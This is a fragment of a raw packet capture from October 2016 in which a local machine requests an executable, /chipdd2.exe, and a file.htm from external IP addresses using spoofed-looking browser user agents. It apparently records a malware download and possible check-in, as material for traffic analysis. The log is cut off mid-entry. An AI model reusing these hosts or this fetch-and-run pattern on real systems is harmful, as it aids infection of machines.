2016-10-23 00:41:27.456904 IP 192.168.1.102.58685 > 176.103.55.73.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /chipdd2.exe HTTP/1.1 E..Gh%@……..f.g7I.=.P..)…..P…….GET /chipdd2.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: 176.103.55.73 Connection: Keep-Alive — E..(sm@……..f.r…G.P`;`..LE.P…G……… 2016-10-23 00:41:43.947220 IP 192.168.1.102.58700 > 176.114.17.14.80: Flags [P.], seq 0:157, ack 1, win 258, length 157: HTTP: GET /file.htm HTTP/1.1 E…sn@….6…f.r…L.P.|’Y0..pP….[..GET /file.htm HTTP/1.1 Host: 176.114.17.14 Content-Length: 164 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14 2016-10-23 00:41:44.101474 IP 192.168.1.102.58698 > 210.92.190.183.80: Flags [S], seq 3229876503, win 8192, options [mss […]